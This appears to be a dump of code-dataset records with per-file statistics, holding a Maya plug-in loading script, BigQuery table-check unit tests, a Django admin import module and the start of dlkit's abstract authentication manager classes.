are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)" ,
label='xGen', tooltip='This button will try to load Arnold in case it\'s not already loaded.', image='openScript.png')
cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">xGen</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
def add_button_custom(text_field_data):
'''
Create a button for manually loading a custom 3rd party plugin
Parameters:
text_field_data (string): The input text containing the name of the plugins you want to load.
'''
plugins_to_load = '['
is_text_valid = True
if len(text_field_data) <= 0:
is_text_valid = False
cmds.warning('The input text is empty, please type the name of the plugin you want to load. (e.g. "mtoa" for Arnold)')
if is_text_valid:
return_list = text_field_data.replace(' ','').split(",")
empty_objects = []
for obj in return_list:
if '' == obj:
empty_objects.append(obj)
for obj in empty_objects:
return_list.remove(obj)
for item in return_list:
plugins_to_load += '\'' + item + '\', '
if plugins_to_load != '[':
plugins_to_load = plugins_to_load[:-2] + ']'
else:
plugins_to_load = plugins_to_load + ']'
if plugins_to_load == '[]':
cmds.warning('The input text is invalid. Please make sure you typed the name of every plugin separated by commas.')
else:
create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\nimport maya.cmds as cmds\nimport sys\n\nplugins_to_load = " + plugins_to_load + "\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)" ,
label='Custom', tooltip='This button will try to load a custom plugin in case it\'s not already loaded.', image='openScript.png')
cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">A custom</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
# Initial Refresh
#refresh_startup_booster_ui()
# Show and Lock Window
cmds.showWindow(build_gui_startup_booster)
cmds.window(build_gui_startup_booster, e=True, s=False)
# Remove the focus from the textfield and give it to the window
cmds.setFocus(build_gui_startup_booster)
# Set Window Icon
qw = omui.MQtUtil.findWindow(build_gui_startup_booster)
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(':/out_time.png')
widget.setWindowIcon(icon)
# main dialog Ends Here =================================================================================
def create_shelf_button(command,
label='',
name=None,
tooltip='',
image=None, # Default Python Icon
label_color=(1, 0, 0), # Default Red
label_bgc_color=(0, 0, 0, 1), # Default Black
bgc_color=None
):
'''
Add a shelf button to the current shelf (according to the provided parameters)
Parameters:
command (str): A string containing the code or command you want the button to run when clicking on it. E.g. "print("Hello World")"
label (str): The label of the button. This is the text you see below it.
name (str): The name of the button as seen inside the shelf editor.
tooltip (str): The help message you get when hovering the button.
image (str): The image used for the button (defaults to Python icon if none)
label_color (tuple): A tuple containing three floats, these are RGB 0 to 1 values to determine the color of the label.
label_bgc_color (tuple): A tuple containing four floats, these are RGBA 0 to 1 values to determine the background of the label.
bgc_color (tuple): A tuple containing three floats, these are RGB 0 to 1 values to determine the background of the icon
'''
maya_version = cmds.about(v=True)
shelf_top_level = mel.eval('$temp=$gShelfTopLevel')
if not cmds.tabLayout(shelf_top_level, exists=True):
cmds.warning('Shelf is not visible')
return
if not image:
image = 'pythonFamily.png'
shelf_tab = cmds.shelfTabLayout(shelf_top_level, query=True, selectTab=True)
shelf_tab = shelf_top_level + '|' + shelf_tab
# Populate extra arguments according to the current Maya version
kwargs = {}
if maya_version >= 2009:
kwargs['commandRepeatable'] = True
if maya_version >= 2011:
kwargs['overlayLabelColor'] = label_color
kwargs['overlayLabelBackColor'] = label_bgc_color
if bgc_color:
kwargs['enableBackground'] = bool(bgc_color)
kwargs['backgroundColor'] = bgc_color
return cmds.shelfButton(parent=shelf_tab, label=label, command=command,
imageOverlayLabel=label, image=image, annotation=tooltip,
width=32, height=32, align='center', **kwargs)
def build_gui_help_startup_booster():
''' Builds the Help UI for GT Startup Booster '''
window_name = "build_gui_help_startup_booster"
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
cmds.window(window_name, title= script_name + " Help", mnb=False, mxb=False, s=True)
cmds.window(window_name, e=True, s=True, wh=[1,1])
main_column = cmds.columnLayout(p= window_name)
# Title Text
cmds.separator(h=12, style='none') # Empty Space
cmds.rowColumnLayout(nc=1, cw=[(1, 310)], cs=[(1, 10)], p=main_column) # Window Size Adjustment
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1, 10)], p=main_column) # Title Column
cmds.text(script_name + " Help", bgc=[.4,.4,.4], fn="boldLabelFont", align="center")
cmds.separator(h=10, style='none', p=main_column) # Empty Space
# Body ====================
help_font = 'smallPlainLabelFont'
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p=main_column)
cmds.text(l=script_name + ' helps decrease the time Maya\n takes to load before becoming fully functional', align="center")
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='How It works:', align="center", fn="boldLabelFont")
cmds.text(l='Not all plugins are used every time Maya is opened,\n but they are usually still loaded during startup.\n This causes the startup time to be quite slow.', align="center", font=help_font)
cmds.separator(h=5, style='none') # Empty Space
cmds.text(l='This script aims to fix that, by helping you skip the heavy \nplugins while still having easy access to them.', align="center", font=help_font)
cmds.separator(h=5, style='none') # Empty Space
cmds.text(l='1st: Optimize\n2nd: Create Shelf Buttons\n3rd: Enjoy faster startups', align="center", font=help_font)
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Plugin List:', align="center", fn="boldLabelFont")
cmds.text(l='This is a list of common plugins that are\n usually automatically loaded by default.', align="center", font=help_font)
cmds.text(l='Plugin File: Name of the file used by the plugin.\nAuto Load: Is this plugin automatically loading?\nInstalled: Is the plugin installed?\nControl: General name of the plugin.', align="center", font=help_font)
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='"Shelf Button" and "Auto Load" Buttons:', align="center", fn="boldLabelFont")
cmds.text(l='Shelf Button: Creates a Shelf Button (under the current shelf)\nto load the plugin and give you feedback on its current state.', align="center", font=help_font)
cmds.separator(h=5, style='none') # Empty Space
cmds.text(l='Auto Load: Toggles the Auto Load function of the plugin.\n(same as "Auto Load" in the plugin manager)', align="center", font=help_font)
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Custom Shelf Button:', align="center", fn="boldLabelFont")
cmds.text(l='This script couldn\'t account for every heavy 3rd party plug-in.\nThis shouldn\'t be an issue as you can manually add any plugin.', align="center", font=help_font)
cmds.text(l='Just manually deactivate your third party plugin by going to \n"Windows > Settings/Preferences > Plug-in Manager"', align="center", font=help_font)
cmds.separator(h=5, style='none') # Empty Space
cmds.text(l='Then create a custom load button using\n the textField that says "Other Plugins"', align="center", font=help_font)
cmds.separator(h=15, style='none') # Empty Space
cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p=main_column)
cmds.text('Guilherme Trevisan ')
cmds.text(l='<a href="mailto:trevisangmw@gmail.com">TrevisanGMW@gmail.com</a>', hl=True, highlightColor=[1,1,1])
cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p=main_column)
cmds.separator(h=15, style='none') # Empty Space
cmds.text(l='<a href="https://github.com/TrevisanGMW">Github</a>', hl=True, highlightColor=[1,1,1])
cmds.separator(h=7, style='none') # Empty Space
# Close Button
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p=main_column)
cmds.separator(h=5, style='none')
cmds.button(l='OK', h=30, c=lambda args: close_help_gui())
cmds.separator(h=8, style='none')
# Show and Lock Window
cmds.showWindow(window_name)
cmds.window(window_name, e=True, s=False)
# Set Window Icon
qw = omui.MQtUtil.findWindow(window_name)
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(':/question.png')
widget.setWindowIcon(icon)
def close_help_gui():
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
# Build UI
if __name__ == "__main__":
build_gui_startup_booster()
| 89.25741
| 3,412
| 0.611756
| 7,699
| 57,214
| 4.424341
| 0.063125
| 0.005402
| 0.007398
| 0.016029
| 0.809764
| 0.787423
| 0.769809
| 0.747644
| 0.726712
| 0.716878
| 0
| 0.0209
| 0.244853
| 57,214
| 641
| 3,413
| 89.25741
| 0.767504
| 0.059041
| 0
| 0.340961
| 0
| 0.086957
| 0.549334
| 0.122314
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0.002288
| 0.04119
| 0
| 0.089245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c1b335adbfc2682edbdb11db26a4ef61d1930f4a
| 4,821
|
py
|
Python
|
tests/slo/predicate/test_sli_table_exists_predicate.py
|
Morgenz/bbq
|
f0fd3f626841c610aee80ad08a61123b7cccb775
|
[
"Apache-2.0"
] | 41
|
2018-05-08T11:54:37.000Z
|
2022-02-09T21:19:17.000Z
|
tests/slo/predicate/test_sli_table_exists_predicate.py
|
Morgenz/bbq
|
f0fd3f626841c610aee80ad08a61123b7cccb775
|
[
"Apache-2.0"
] | 139
|
2018-06-07T13:45:21.000Z
|
2021-04-30T20:44:06.000Z
|
tests/slo/predicate/test_sli_table_exists_predicate.py
|
Morgenz/bbq
|
f0fd3f626841c610aee80ad08a61123b7cccb775
|
[
"Apache-2.0"
] | 5
|
2019-09-11T12:28:24.000Z
|
2022-02-04T21:38:29.000Z
|
import unittest
from mock import Mock, patch
from src.slo.backup_creation_latency.latency_query_specification import \
LatencyQuerySpecification
from src.slo.predicate.sli_table_exists_predicate import SLITableExistsPredicate
from src.commons.big_query.big_query import BigQuery
class TestSLITableExistsPredicate(unittest.TestCase):
@patch('src.commons.big_query.big_query.BigQuery.__init__',
Mock(return_value=None))
@patch('src.commons.big_query.big_query.BigQuery.get_table',
Mock(return_value=None))
def test_should_return_false_for_not_existing_table(self):
# given
sli_table = self.__create_non_partitioned_sli_table()
# when
exists = SLITableExistsPredicate(BigQuery(), LatencyQuerySpecification).exists(sli_table)
# then
self.assertFalse(exists)
@patch('src.commons.big_query.big_query.BigQuery.__init__',
Mock(return_value=None))
@patch('src.commons.big_query.big_query.BigQuery.get_table',
Mock(return_value={'projectId': 'p', 'schema': {'fields': []}}))
def test_should_return_true_for_existing_table(self):
# given
sli_table = self.__create_non_partitioned_sli_table()
# when
exists = SLITableExistsPredicate(BigQuery(), LatencyQuerySpecification).exists(sli_table)
# then
self.assertTrue(exists)
@patch('src.commons.big_query.big_query.BigQuery.__init__',
Mock(return_value=None))
@patch('src.commons.big_query.big_query.BigQuery.get_table',
Mock(return_value={'projectId': 'p', 'schema': {'fields': []},
'timePartitioning': {'type': 'DAY'}}))
@patch('src.commons.big_query.big_query.BigQuery.list_table_partitions',
Mock(return_value=[]))
def test_should_return_false_for_not_existing_partition(self):
# given
sli_table = self.__create_partitioned_sli_table()
# when
exists = SLITableExistsPredicate(BigQuery(), LatencyQuerySpecification).exists(sli_table)
# then
self.assertFalse(exists)
@patch('src.commons.big_query.big_query.BigQuery.__init__',
Mock(return_value=None))
@patch('src.commons.big_query.big_query.BigQuery.get_table',
Mock(return_value={'projectId': 'p', 'schema': {'fields': []}}))
@patch('src.commons.big_query.big_query.BigQuery.list_table_partitions',
Mock(return_value=[{'partitionId': '20180808'}]))
def test_should_return_true_for_existing_partition(self):
# given
sli_table = self.__create_partitioned_sli_table()
# when
exists = SLITableExistsPredicate(BigQuery(), LatencyQuerySpecification).exists(sli_table)
# then
self.assertTrue(exists)
@patch('src.commons.big_query.big_query.BigQuery.__init__',
Mock(return_value=None))
@patch('src.commons.big_query.big_query.BigQuery.get_table',
Mock(return_value={'projectId': 'p'}))
def test_should_return_false_when_there_is_no_schema(self):
# given
sli_table = self.__create_non_partitioned_sli_table()
# when
exists = SLITableExistsPredicate(BigQuery(), LatencyQuerySpecification).exists(sli_table)
# then
self.assertFalse(exists)
@patch('src.commons.big_query.big_query.BigQuery.__init__',
Mock(return_value=None))
@patch('src.commons.big_query.big_query.BigQuery.get_table',
Mock(return_value={'projectId': 'p', 'schema': {'fields': []}}))
@patch.object(BigQuery, 'list_table_partitions')
def test_should_not_list_partitions_in_non_partitioned_table(self, list_table_partitions):
# given
sli_table = self.__create_non_partitioned_sli_table()
# when
exists = SLITableExistsPredicate(BigQuery(), LatencyQuerySpecification).exists(sli_table)
# then
self.assertTrue(exists)
list_table_partitions.assert_not_called()
def __create_non_partitioned_sli_table(self):
return {
"snapshotTime": None,
"projectId": 'p',
"datasetId": 'd',
"tableId": 'd',
"partitionId": None,
"creationTime": '1500000000000',
"lastModifiedTime": None,
"backupCreated": None,
"backupLastModified": None,
"xDays": 4
}
def __create_partitioned_sli_table(self):
return {
"snapshotTime": None,
"projectId": 'p',
"datasetId": 'd',
"tableId": 'd',
"partitionId": '20180808',
"creationTime": '1500000000000',
"lastModifiedTime": None,
"backupCreated": None,
"backupLastModified": None,
"xDays": 4
}
| 36.522727
| 97
| 0.65671
| 503
| 4,821
| 5.912525
| 0.151093
| 0.080699
| 0.065568
| 0.090787
| 0.834902
| 0.823806
| 0.815064
| 0.797579
| 0.777404
| 0.777404
| 0
| 0.011806
| 0.226924
| 4,821
| 131
| 98
| 36.801527
| 0.786155
| 0.019705
| 0
| 0.704545
| 0
| 0
| 0.242881
| 0.157034
| 0
| 0
| 0
| 0
| 0.079545
| 1
| 0.090909
| false
| 0
| 0.056818
| 0.022727
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
de02e77c9a86e8e691b8f69a2e507bd04fe2d7d1
| 374
|
py
|
Python
|
product_management_models/product_supplies/admin.py
|
reimibeta/django-product-management-models
|
f51e94cc6ae605ea21706ffe2baedc53b980112f
|
[
"Apache-2.0"
] | null | null | null |
product_management_models/product_supplies/admin.py
|
reimibeta/django-product-management-models
|
f51e94cc6ae605ea21706ffe2baedc53b980112f
|
[
"Apache-2.0"
] | null | null | null |
product_management_models/product_supplies/admin.py
|
reimibeta/django-product-management-models
|
f51e94cc6ae605ea21706ffe2baedc53b980112f
|
[
"Apache-2.0"
] | null | null | null |
""" product supply """
from product_management_models.product_supplies.class_admins.product_supply_admin import *
""" product supply delivery """
from product_management_models.product_supplies.class_admins.product_supply_delivery_admin import *
""" product supply stock """
from product_management_models.product_supplies.class_admins.product_supply_stock_admin import *
| 41.555556
| 99
| 0.84492
| 46
| 374
| 6.434783
| 0.26087
| 0.263514
| 0.212838
| 0.273649
| 0.668919
| 0.668919
| 0.668919
| 0.668919
| 0.668919
| 0.668919
| 0
| 0
| 0.074866
| 374
| 8
| 100
| 46.75
| 0.855491
| 0.037433
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a9b935f3bc09eeb9bb71e8e25397532e112676ea
| 50,707
|
py
|
Python
|
dlkit/abstract_osid/authentication/managers.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/abstract_osid/authentication/managers.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/abstract_osid/authentication/managers.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""Implementations of authentication abstract base class managers."""
# pylint: disable=invalid-name
# Method names comply with OSID specification.
# pylint: disable=no-init
# Abstract classes do not define __init__.
# pylint: disable=too-few-public-methods
# Some interfaces are specified as 'markers' and include no methods.
# pylint: disable=too-many-public-methods
# Number of methods are defined in specification
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
# pylint: disable=too-many-arguments
# Argument signature defined in specification.
# pylint: disable=duplicate-code
# All apparent duplicates have been inspected. They aren't.
import abc
class AuthenticationProfile:
"""The ``AuthenticationProfile`` describes the interoperability among authentication services."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def supports_visible_federation(self):
"""Tests if federation is visible.
:return: ``true`` if visible federation is supported ``,`` ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_authentication_acquisition(self):
"""Tests is authentication acquisition is supported.
Authentication acquisition is responsible for acquiring client
side authentication credentials.
:return: ``true`` if authentication acquisiiton is supported ``,`` ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_authentication_validation(self):
"""Tests if authentication validation is supported.
Authentication validation verifies given authentication
credentials and maps to an agent identity.
:return: ``true`` if authentication validation is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agent_lookup(self):
"""Tests if an agent lookup service is supported.
An agent lookup service defines methods to access agents.
:return: ``true`` if agent lookup is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agent_query(self):
"""Tests if an agent query service is supported.
:return: ``true`` if agent query is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agent_search(self):
"""Tests if an agent search service is supported.
:return: ``true`` if agent search is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agent_admin(self):
"""Tests if an agent administrative service is supported.
:return: ``true`` if agent admin is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agent_notification(self):
"""Tests if agent notification is supported.
Messages may be sent when agents are created, modified, or
deleted.
:return: ``true`` if agent notification is supported ``,`` ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agent_agency(self):
"""Tests if retrieving mappings of agents and agencies is supported.
:return: ``true`` if agent agency mapping retrieval is supported ``,`` ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agent_agency_assignment(self):
"""Tests if managing mappings of agents and agencies is supported.
:return: ``true`` if agent agency assignment is supported ``,`` ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agent_smart_agency(self):
"""Tests if agent smart agency is available.
:return: ``true`` if agent smart agency is supported ``,`` ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agency_lookup(self):
"""Tests if an agency lookup service is supported.
An agency lookup service defines methods to access agencies.
:return: ``true`` if agency lookup is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agency_query(self):
"""Tests if an agency query service is supported.
:return: ``true`` if agency query is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agency_search(self):
"""Tests if an agency search service is supported.
:return: ``true`` if agency search is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agency_admin(self):
"""Tests if an agency administrative service is supported.
:return: ``true`` if agency admin is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agency_notification(self):
"""Tests if agency notification is supported.
Messages may be sent when agencies are created, modified, or
deleted.
:return: ``true`` if agency notification is supported ``,`` ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agency_hierarchy(self):
"""Tests if an agency hierarchy traversal is supported.
:return: ``true`` if an agency hierarchy traversal is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_agency_hierarchy_design(self):
"""Tests if an agency hierarchy design is supported.
:return: ``true`` if an agency hierarchy design is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_authentication_keys(self):
"""Tests if an authentication key service is available.
:return: ``true`` if an authentication key service is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def supports_authentication_process(self):
"""Tests if an authentication process service is available.
:return: ``true`` if an authentication process service is supported, ``false`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def get_agent_record_types(self):
"""Gets the supported ``Agent`` record types.
:return: a list containing the supported ``Agent`` record types
:rtype: ``osid.type.TypeList``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.type.TypeList
agent_record_types = property(fget=get_agent_record_types)
@abc.abstractmethod
def supports_agent_record_type(self, agent_record_type):
"""Tests if the given ``Agent`` record type is supported.
:param agent_record_type: a ``Type`` indicating an ``Agent`` record type
:type agent_record_type: ``osid.type.Type``
:return: ``true`` if the given record Type is supported, ``false`` otherwise
:rtype: ``boolean``
:raise: ``NullArgument`` -- ``agent_record_type`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def get_agent_search_record_types(self):
"""Gets the supported ``Agent`` search record types.
:return: a list containing the supported ``Agent`` search record types
:rtype: ``osid.type.TypeList``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.type.TypeList
agent_search_record_types = property(fget=get_agent_search_record_types)
@abc.abstractmethod
def supports_agent_search_record_type(self, agent_search_record_type):
"""Tests if the given ``Agent`` search record type is supported.
:param agent_search_record_type: a ``Type`` indicating an ``Agent`` search record type
:type agent_search_record_type: ``osid.type.Type``
:return: ``true`` if the given Type is supported, ``false`` otherwise
:rtype: ``boolean``
:raise: ``NullArgument`` -- ``agent_search_record_type`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def get_agency_record_types(self):
"""Gets the supported ``Agency`` record types.
:return: a list containing the supported ``Agency`` record types
:rtype: ``osid.type.TypeList``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.type.TypeList
agency_record_types = property(fget=get_agency_record_types)
@abc.abstractmethod
def supports_agency_record_type(self, agency_record_type):
"""Tests if the given ``Agency`` record type is supported.
:param agency_record_type: a ``Type`` indicating an ``Agency`` record type
:type agency_record_type: ``osid.type.Type``
:return: ``true`` if the given record Type is supported, ``false`` otherwise
:rtype: ``boolean``
:raise: ``NullArgument`` -- ``agency_record_type`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def get_agency_search_record_types(self):
"""Gets the supported ``Agency`` search record types.
:return: a list containing the supported ``Agency`` search record types
:rtype: ``osid.type.TypeList``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.type.TypeList
agency_search_record_types = property(fget=get_agency_search_record_types)
@abc.abstractmethod
def supports_agency_search_record_type(self, agency_search_record_type):
"""Tests if the given ``Agency`` search record type is supported.
:param agency_search_record_type: a ``Type`` indicating an ``Agency`` search record type
:type agency_search_record_type: ``osid.type.Type``
:return: ``true`` if the given Type is supported, ``false`` otherwise
:rtype: ``boolean``
:raise: ``NullArgument`` -- ``agency_search_record_type`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
class AuthenticationManager:
"""The authentication manager provides access to authentication sessions and provides interoperability tests for various aspects of this service.
The sessions included in this manager are:
* ``AgentLookupSession:`` a session to look up ``Agents``
* ``AgentQuerySession:`` a session to query ``Agents``
* ``AgentSearchSession:`` a session to search ``Agents``
* ``AgentAdminSession:`` a session to create, modify and delete
``Agents``
* ``AgentNotificationSession: a`` session to receive messages
pertaining to ``Agent`` changes
* ``AgentAgencySession:`` a session to retrieve ``Agent`` to
``Agency`` mappings
* ``AgentAgencyAssignmentSession:`` a session to manage ``Agent``
to ``Agency`` mappings
* ``AgentSmartAgencySession:`` a session to create dynamic
agencies
* ``AgencyLookupSession:`` a session to lookup agencies
* ``AgencyQuerySession:`` a session to query agencies
* ``AgencySearchSession`` : a session to search agencies
* ``AgencyAdminSession`` : a session to create, modify and delete
agencies
* ``AgencyNotificationSession`` : a session to receive messages
pertaining to ``Agency`` changes
* ``AgencyHierarchySession`` : a session to traverse the
``Agency`` hierarchy
* ``AgencyHierarchyDesignSession`` : a session to manage the
``Agency`` hierarchy
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_agent_lookup_session(self):
"""Gets the ``OsidSession`` associated with the agent lookup service.
:return: an ``AgentLookupSession``
:rtype: ``osid.authentication.AgentLookupSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_lookup()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_lookup()`` is ``true``.*
"""
return # osid.authentication.AgentLookupSession
agent_lookup_session = property(fget=get_agent_lookup_session)
@abc.abstractmethod
def get_agent_lookup_session_for_agency(self, agency_id):
"""Gets the ``OsidSession`` associated with the agent lookup service for the given agency.
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:return: ``an _agent_lookup_session``
:rtype: ``osid.authentication.AgentLookupSession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
